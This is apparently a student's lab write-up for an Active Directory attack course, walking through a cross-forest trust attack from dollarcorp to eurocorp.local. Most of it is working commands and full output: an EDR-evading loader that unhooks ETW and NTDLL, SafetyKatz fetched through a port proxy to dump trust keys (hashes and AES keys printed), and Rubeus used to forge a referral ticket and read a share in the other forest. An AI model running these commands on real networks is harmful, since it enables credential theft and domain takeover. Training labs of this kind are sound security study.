crtp-20

Learning Object 20

Tasks

1 – With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest

Flag 31 [eurocorp-dc] – Service for which a TGS is requested from eurocorp-dc 🚩

Flag 32 [eurocorp-dc] – Contents of secret.txt on eurocorp-dc 🚩

Solutions
1 – With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest

We need the trust key for the trust between dollarcorp and eurocrop, which can be retrieved using Mimikatz or SafetyKatz.

Start a process with DA privileges. Run the below command from an elevated command prompt:

First to all start a process as DA:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Run the below commands from the process running as DA to copy Loader.exe on dcorp-dc and use it to extract credentials:

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
winrs -r:dcorp-dc cmd
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.67
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"

mimikatz(commandline) # lsadump::evasive-trust /patch

Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)
C:\Windows\system32>klist

Current LogonId is 0:0x2d293d7f

Cached Tickets: (1)

#0>     Client: svcadmin @ DOLLARCORP.MONEYCORP.LOCAL
        Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 11/21/2025 7:09:29 (local)
        End Time:   11/21/2025 17:09:29 (local)
        Renew Time: 11/28/2025 7:09:29 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
C:\AD\Tools\Loader.exe
1 File(s) copied

C:\Windows\system32>winrs -r:dcorp-dc cmd
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.

C:\Users\svcadmin>netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.98
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.98


C:\Users\svcadmin>C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : http://127.0.0.1:8080/SafetyKatz.exe Arguments : lsadump::evasive-trust /patch exit
  .#####.   mimikatz 2.2.0 (x64) #19041 Nov  5 2024 21:52:02

mimikatz(commandline) # lsadump::evasive-trust /patch

Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)

Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
    * 11/20/2025 9:11:47 PM - CLEAR   - 1d 02 4f 0e ef 3c 6b c5 a9 68 da a8 ff 84 46 8a d7 73 65 a8 a6 f9 66 7a 36 b9 84 0e
        * aes256_hmac       1474657fb02a0d0962ef38a7e2012168125740f0792ecfdcae819a0bb71f059e
        * aes128_hmac       76dde25f5cb939a9d05a27c51e5bc7ba
        * rc4_hmac_nt       b97258189d756ae1eceeafa5be671457

 [ Out ] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 11/20/2025 9:11:47 PM - CLEAR   - 1d 02 4f 0e ef 3c 6b c5 a9 68 da a8 ff 84 46 8a d7 73 65 a8 a6 f9 66 7a 36 b9 84 0e
        * aes256_hmac       12a4abf8b945837dcbb84057eda74edc4640e6b4cd4217616a90418e1b162389
        * aes128_hmac       97dba31e904a25f6fc39fdd6166ab53e
        * rc4_hmac_nt       b97258189d756ae1eceeafa5be671457

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
    * 10/28/2025 8:02:55 PM - CLEAR   - 87 56 2b ce 99 43 58 c6 aa 1e e9 c3 e3 17 23 37 3b 85 aa 14 d5 86 06 f4 a8 e8 b5 dd
        * aes256_hmac       b808886542d5ea5a9208dda236cc687cd861a73973eed77c0ef9d734411ec26c
        * aes128_hmac       829ca62806fba9880a9e57570c9a7b0b
        * rc4_hmac_nt       f5e6ae3ac347db331bf8fae481e2add9

 [Out-1] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 10/28/2025 8:02:55 PM - CLEAR   - 87 56 2b ce 99 43 58 c6 aa 1e e9 c3 e3 17 23 37 3b 85 aa 14 d5 86 06 f4 a8 e8 b5 dd
        * aes256_hmac       b1730088086a05cd9f6b6e110d4c2197c434cbb425237e833e82ef6d0ffef3d6
        * aes128_hmac       6b069f352975003d6667f937bb316f69
        * rc4_hmac_nt       f5e6ae3ac347db331bf8fae481e2add9


Domain: US.DOLLARCORP.MONEYCORP.LOCAL (US / S-1-5-21-1028785420-4100948154-1806204659)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
    * 11/20/2025 9:11:54 PM - CLEAR   - 34 33 3c 6c 17 9d 51 f2 3c 5b 51 66 0f 2b 28 6c 95 a5 b5 86 8c 84 8d 96 76 cc 66 c3
        * aes256_hmac       cd470abac8112ddf6bb71476b299a72cd12c1431d43391f9dfa0b5b4dec103d9
        * aes128_hmac       4954422aabc2d55da5da954c57dd4835
        * rc4_hmac_nt       54eeab7d22c9737cc200d697d2528a40

 [ Out ] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 11/20/2025 9:11:54 PM - CLEAR   - 34 33 3c 6c 17 9d 51 f2 3c 5b 51 66 0f 2b 28 6c 95 a5 b5 86 8c 84 8d 96 76 cc 66 c3
        * aes256_hmac       c19d7fd15fe97c0498afd8a1d0677ff5d21da0c87c9962d755d649380e582818
        * aes128_hmac       1bc4b26049a0394471fd7ec7ffb1663b
        * rc4_hmac_nt       54eeab7d22c9737cc200d697d2528a40

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
    * 10/28/2025 8:03:10 PM - CLEAR   - 52 32 26 df e4 45 cd 5f 6f 81 46 1d 08 5f 84 2d 87 15 cc 5b 23 df 86 29 46 06 2c 3c
        * aes256_hmac       c46a67dc004efe316925c4229f77861ad551c14fe7e53bc86dc4fb07c38a0417
        * aes128_hmac       850f8059df357c0f05d9dfd3be600350
        * rc4_hmac_nt       b45751dacee142681ed299777fbd5e85

 [Out-1] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 10/28/2025 8:03:10 PM - CLEAR   - 52 32 26 df e4 45 cd 5f 6f 81 46 1d 08 5f 84 2d 87 15 cc 5b 23 df 86 29 46 06 2c 3c
        * aes256_hmac       b181e6f8dc36948d6d6136d1b2e0a2d671ffe95c7f1351e25a29b8820b3b5717
        * aes128_hmac       95ae70e4be6d836b095c52e04c0cc5d8
        * rc4_hmac_nt       b45751dacee142681ed299777fbd5e85


Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 11/20/2025 9:11:52 PM - CLEAR   - c1 21 4b 8c c0 d4 0f b1 41 db c9 36 45 25 e7 d5 44 e0 e4 2a 4e 22 2f 18 4a c7 82 5e
        * aes256_hmac       de4319c5f0f09ea07d28b20dfd473424d293fa5eb4fe0d7c35c622c7a7141883
        * aes128_hmac       76374484bba81cf3b846aa24cf7f5e6b
        * rc4_hmac_nt       d418915cb2459e02cd612e1bab6632a7

 [ Out ] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 11/20/2025 9:11:52 PM - CLEAR   - c1 21 4b 8c c0 d4 0f b1 41 db c9 36 45 25 e7 d5 44 e0 e4 2a 4e 22 2f 18 4a c7 82 5e
        * aes256_hmac       b7edf9f19286966d4d1984b76af30839ca06a606e4ead91f0f76c8e8007917d0
        * aes128_hmac       13e386e460f0cd28241d49b17155783d
        * rc4_hmac_nt       d418915cb2459e02cd612e1bab6632a7

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 10/28/2025 8:03:04 PM - CLEAR   - a0 2a f2 8c 58 dd 33 17 7d ab 7c ad 8c f0 44 12 bf a2 fe 46 de 82 ad c6 4f 48 02 fc
        * aes256_hmac       e488ce0980cb99955f6e125bf270fc3f777872027d12589384a4b20428f18cf4
        * aes128_hmac       fb717a9bedc09971ccc9d6759f90f20a
        * rc4_hmac_nt       eb18052334cdd048166749c13e2e0b5c

 [Out-1] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 10/28/2025 8:03:04 PM - CLEAR   - a0 2a f2 8c 58 dd 33 17 7d ab 7c ad 8c f0 44 12 bf a2 fe 46 de 82 ad c6 4f 48 02 fc
        * aes256_hmac       ab20acc4fb33ab4959a4aaf5d40805295b57158b0c3a8a589b9ac39b276f1750
        * aes128_hmac       f02dd82fc00fd22d11b32e1d186a7026
        * rc4_hmac_nt       eb18052334cdd048166749c13e2e0b5c


mimikatz(commandline) # exit
Bye!

C:\Users\svcadmin>

C:\Users\svcadmin>
Let's Forge a referral ticket.
Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 11/20/2025 9:11:52 PM - CLEAR   - c1 21 4b 8c c0 d4 0f b1 41 db c9 36 45 25 e7 d5 44 e0 e4 2a 4e 22 2f 18 4a c7 82 5e
        * aes256_hmac       de4319c5f0f09ea07d28b20dfd473424d293fa5eb4fe0d7c35c622c7a7141883
        * aes128_hmac       76374484bba81cf3b846aa24cf7f5e6b
        * rc4_hmac_nt       d418915cb2459e02cd612e1bab6632a7

 

Note that we are not injecting any SID History here as it would be filtered out. Run the below command:

In a new low priv cmd prompt run

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:d418915cb2459e02cd612e1bab6632a7 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap
C:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:d418915cb2459e02cd612e1bab6632a7 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:d418915cb2459e02cd612e1bab6632a7 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap
[*] Action: Build TGS

[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-1028785420-4100948154-1806204659-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC

[*] Domain         : DOLLARCORP.MONEYCORP.LOCAL (dcorp)
[*] SID            : S-1-5-21-719815819-3726368948-3917688648
[*] UserId         : 500
[*] Groups         : 544,512,520,513
[*] ExtraSIDs      : S-1-5-21-335606122-960912869-3279953914-519
[*] ServiceKey     : D418915CB2459E02CD612E1BAB6632A7
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey         : D418915CB2459E02CD612E1BAB6632A7
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_MD5
[*] Service        : krbtgt
[*] Target         : DOLLARCORP.MONEYCORP.LOCAL

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@dollarcorp.moneycorp.local'

[*] AuthTime       : 11/21/2025 7:17:44 AM
[*] StartTime      : 11/21/2025 7:17:44 AM
[*] EndTime        : 11/21/2025 5:17:44 PM
[*] RenewTill      : 11/28/2025 7:17:44 AM

[*] base64(ticket.kirbi):

      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




C:\Users\student98>

 

Copy the base64 encoded ticket from above and use it in the following command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket:

Once the ticket is injected, we can access explicitly shared resources on eurocorp-dc.

type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt
dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\
C:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket: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
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket: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
[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/eurocorp-dc.eurocorp.LOCAL'
[*] Using domain controller: eurocorp-dc.eurocorp.LOCAL (172.16.15.1)
[+] TGS request successful!
[+] Ticket successfully imported!
